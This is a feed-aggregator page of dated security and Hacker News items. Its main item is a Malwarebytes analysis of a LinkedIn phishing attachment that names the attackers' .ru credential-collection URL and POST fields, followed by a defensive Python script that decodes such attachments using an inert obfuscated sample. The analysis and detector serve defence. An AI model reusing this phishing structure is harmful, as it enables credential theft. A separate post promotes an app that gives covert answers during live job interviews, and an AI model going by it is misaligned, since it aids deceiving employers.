Feed aggregator

LA Metro Cyberattack Linked to Iranian State-Sponsored Hackers

Security Week - Wed, 05/27/2026 - 5:33am

The attack was claimed by a hacktivist group, but evidence showed it used infrastructure linked to Iranian government threat actors.

The post LA Metro Cyberattack Linked to Iranian State-Sponsored Hackers appeared first on SecurityWeek.

Categories: SecurityWeek

Fake LinkedIn emails abuse Adobe to track victims

Malware Bytes Security - Wed, 05/27/2026 - 5:32am

Cybercriminals are abusing Adobe infrastructure in a LinkedIn phishing campaign that steals passwords and redirects victims to the legitimate LinkedIn site afterward.

The phishing email masquerades as a business inquiry designed to look like it’s come via LinkedIn and includes a fake “contract” attachment. But it contains a number of red flags:

  • The sender name, email address, and email signature don’t match
  • The sender company exists, but not in the US
  • The sender name exists, but not at that company
  • The attachment has a double file extension: pdf.html

“I would like to do business with you via LinkedIn. I’m a buyer.

Please find attached the signed contract No. #33110:12000pcs.

I look forward to hearing from you.”

Double file extensions are often used to mislead recipients into thinking a file is something other than what it really is. The attached HTML file is highly obfuscated. Essentially, it is a single line of JavaScript.

The script uses two common obfuscation methods: URL encoding and Base64. The script is divided into two Base64-encoded sections.

When you open the attachment, you’ll find a simple login form.

The target’s email address is hardcoded and cannot be changed or removed, possibly because some researchers have no qualms about flooding the receiving channel with false credentials.

But figuring out the receiving channel is where it gets interesting. Network analysis reveals this URL:

https://lnkd.tt.omtrdc.net/rest/v1/delivery

This domain belongs to Adobe and is associated with the Adobe Target A/B testing platform. But the campaign isn’t using Adobe Target to receive the phished credentials. Instead, the attackers are abusing Adobe Target as a redirect point in the phishing flow, most likely to track victims who fell for the phishing email.

In the end, it redirects the target to the legitimate business.linkedin.com site to reduce any suspicion the target may still have.

After deobfuscating the scripts, we found the destination for the submitted credentials:

All in all, even with the level of obfuscation, the method is very raw and simple:

POST to: http://a1263367.xsph.ru/taam/Ln.php

With data:

  • AA = hardcoded email address
  • BB = whatever password the user entered

The PHP file hosted on a .ru domain handles the redirect to LinkedIn, making the victim think they just logged in successfully.
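A static triage sketch for an attachment like the one described above, added here as an example and not Malwarebytes' own tooling: it flags the double extension, peels the URL-encoding and Base64 layers without executing any script, and lists every URL it uncovers so the form destination and tracking endpoint can be reviewed or blocked. The function names, the extension lists, and the inert sample with its `.invalid` hostnames are constructed for illustration.

```python
import base64
import binascii
import re
from urllib.parse import quote, unquote

DECOY_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "jpg", "png", "txt"}
ACTIVE_EXTS = {"html", "htm", "shtml", "svg", "hta", "js"}
B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
URL_RE = re.compile(r"https?://[^\s\"'<>\\)]+")

def has_double_extension(filename):
    """True for names like contract.pdf.html: document-looking, browser-executed."""
    parts = filename.lower().rsplit(".", 2)
    return len(parts) == 3 and parts[1] in DECOY_EXTS and parts[2] in ACTIVE_EXTS

def peel(text, max_depth=5):
    """Return each decoded layer: percent-encoding first, then Base64 runs."""
    layers, todo = [], [(text, 0)]
    while todo:
        cur, depth = todo.pop()
        while unquote(cur) != cur:          # strip nested URL encoding
            cur = unquote(cur)
        layers.append(cur)
        if depth >= max_depth:
            continue
        for run in B64_RUN.findall(cur):
            try:
                raw = base64.b64decode(run + "=" * (-len(run) % 4), validate=True)
                todo.append((raw.decode("utf-8"), depth + 1))
            except (binascii.Error, UnicodeDecodeError):
                pass                        # not Base64-encoded text, ignore
    return layers

def extract_urls(text):
    """Every http(s) URL found in any decoded layer, de-duplicated and sorted."""
    return sorted({u for layer in peel(text) for u in URL_RE.findall(layer)})

def triage(filename, body):
    return {"double_extension": has_double_extension(filename), "urls": extract_urls(body)}

def build_sample():
    """Constructed, inert stand-in: two Base64 sections in a percent-encoded one-liner."""
    p1 = base64.b64encode(b'<form method="POST" action="http://collector.invalid/in.php">').decode()
    p2 = base64.b64encode(b'<img src="https://tracker.invalid/rest/v1/delivery"></form>').decode()
    js = f'document.write(atob("{p1}")+atob("{p2}"))'
    return "<script>eval(unescape('" + quote(js, safe="") + "'))</script>"

if __name__ == "__main__":
    print(triage("contract.pdf.html", build_sample()))
```

A URL that only appears after decoding, combined with a double extension, is a strong signal for quarantining the message at the mail gateway.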

How to stay safe

The good news: Once you know what to look for, these attacks are much easier to spot and block. The bad news: They’re cheap, scalable, and likely to keep circulating.

So, the next time a “PDF” asks for your password in a browser, pause and think about what might be hiding underneath.

Beyond avoiding unsolicited attachments, here are a few ways to stay safe:

  • Only access your accounts through official apps or by typing the official website directly into your browser.
  • Check file extensions carefully. Even if a file looks like a PDF, it may not be.
  • Enable multi-factor authentication for your critical accounts.
  • Use an up-to-date, real-time anti-malware solution with a web protection module.

Pro tip: Malwarebytes Scam Guard recognized this email as a scam.

Categories: Malware Bytes

Discover European Tech Alternatives

Hacker News - Wed, 05/27/2026 - 5:16am

Article URL: https://techropa.com

Comments URL: https://news.ycombinator.com/item?id=48291656

Points: 1

# Comments: 0

Categories: Hacker News

Show HN: Sotto – AI interview assistant for Mac

Hacker News - Wed, 05/27/2026 - 5:04am

Being a software engineer myself, I understand how grueling and tiresome software engineering interviews can be. Sometimes I found myself botching technical interviews due to nerves, only to realize a few minutes after the Zoom call that I knew the answer all along. Many factors can cause skilled engineers to freeze up during interviews - and let's be honest, most of the skills tested during interviews are irrelevant to the actual day-to-day job.

I created a Mac desktop app at https://getsotto.ai/. It's made for engineers who have studied LeetCode patterns but are in need of hints to guide them in the right direction during interview time. If you're truly stuck, it will also offer a correct solution, but it will not help engineers who have no data structures and algorithms experience. I welcome any feedback and please join the Discord server!

Comments URL: https://news.ycombinator.com/item?id=48291585

Points: 1

# Comments: 0

Categories: Hacker News

Go: Support for Generic Methods

Hacker News - Wed, 05/27/2026 - 5:02am

Categories: Hacker News

Show HN: Clark Hash, 32x smaller searchable sketches for embeddings

Hacker News - Wed, 05/27/2026 - 4:44am

Made a small library using GPT5.5-Pro and autoresearch.

You can convert 384-dim f32 vectors from 1536 bytes to 48 bytes without calibration. Works for petabyte-scale processing of text in a pure online manner.

Comments URL: https://news.ycombinator.com/item?id=48291451

Points: 1

# Comments: 0

Categories: Hacker News
